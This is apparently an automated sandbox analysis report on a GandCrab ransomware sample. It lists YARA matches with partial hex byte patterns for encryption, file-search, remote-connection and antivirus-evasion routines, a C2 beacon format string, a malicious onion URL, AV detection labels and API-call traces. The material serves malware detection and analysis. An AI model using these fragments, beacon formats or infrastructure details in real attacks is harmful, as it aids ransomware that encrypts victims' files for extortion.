32.3.ssapst.exe.3790000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
32.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
32.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
32.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
32.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
32.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
32.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
6.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
6.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
18.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
18.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
18.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
18.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
18.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
18.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
6.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
6.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
6.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
6.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
26.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
26.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
26.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
26.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
26.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
26.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
26.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
34.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
34.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
34.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
34.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
34.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
34.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
0.2.wThN5MTIsw.exe.f4e0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0.2.wThN5MTIsw.exe.f4e0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0.2.wThN5MTIsw.exe.f4e0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0.2.wThN5MTIsw.exe.f4e0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.2.wThN5MTIsw.exe.f4e0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0.2.wThN5MTIsw.exe.f4e0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.2.wThN5MTIsw.exe.f4e0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 4E 0F 8B 35 44 A1 4E 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 4E 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 4E 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 4E 0F 8B 35 10 A1 4E 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 4E 0F C7 44 24 1C 64 F4 4E 0F C7 44 24 20 80 F4 4E 0F C7 44 24 24 A0 F4 4E 0F C7 44 24 28 BC F4 4E 0F C7 44 24 2C D8 F4 4E 0F C7 44 24 30 F0 F4 4E 0F C7 44 24 34 04 F5 4E 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 4E 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 4F 0F C7 45 B8 BC 03 4F 0F C7 45 BC ...
Click to see the 468 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: wThN5MTIsw.exe	Virustotal: Detection: 90%			Perma Link
Source: wThN5MTIsw.exe	ReversingLabs: Detection: 93%

Antivirus / Scanner detection for submitted sample

Source: wThN5MTIsw.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Machine Learning detection for sample

Source: wThN5MTIsw.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe

Joe Sandbox ML: detected

Source: 34.3.ssapst.exe.32a0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.wThN5MTIsw.exe.3170000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 18.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 32.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 6.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.0.wThN5MTIsw.exe.f4e0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 24.3.ssapst.exe.3b60000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 31.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 24.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 19.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 6.3.ssapst.exe.2f70000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 35.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 19.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 30.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 26.3.ssapst.exe.3830000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.3.ssapst.exe.36d0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 15.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.3.ssapst.exe.3300000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 35.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.3.ssapst.exe.3730000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 33.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 17.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 18.3.ssapst.exe.3230000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 8.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 22.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 24.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 19.3.ssapst.exe.3520000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 25.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 17.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.3.ssapst.exe.30f0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 22.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.3.ssapst.exe.38c0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 30.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.3.ssapst.exe.3730000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 34.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 30.3.ssapst.exe.2fc0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 33.3.ssapst.exe.3d30000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.ssapst.exe.3640000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.2.wThN5MTIsw.exe.f4e0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 33.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 34.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 31.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 26.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 32.3.ssapst.exe.3790000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 26.2.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 32.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 18.0.ssapst.exe.fe60000.0.unpack	Avira: Label: TR/Dropper.Gen

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E5860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	0_2_0F4E5860
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E8400 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	0_2_0F4E8400
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E4B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	0_2_0F4E4B20
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E63E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	0_2_0F4E63E0
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E82B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	0_2_0F4E82B0
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E6660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	0_2_0F4E6660
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E5670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	0_2_0F4E5670
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E53D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,	0_2_0F4E53D0
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E34F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,	0_2_0F4E34F0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE663E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	2_2_0FE663E0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE682B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	2_2_0FE682B0
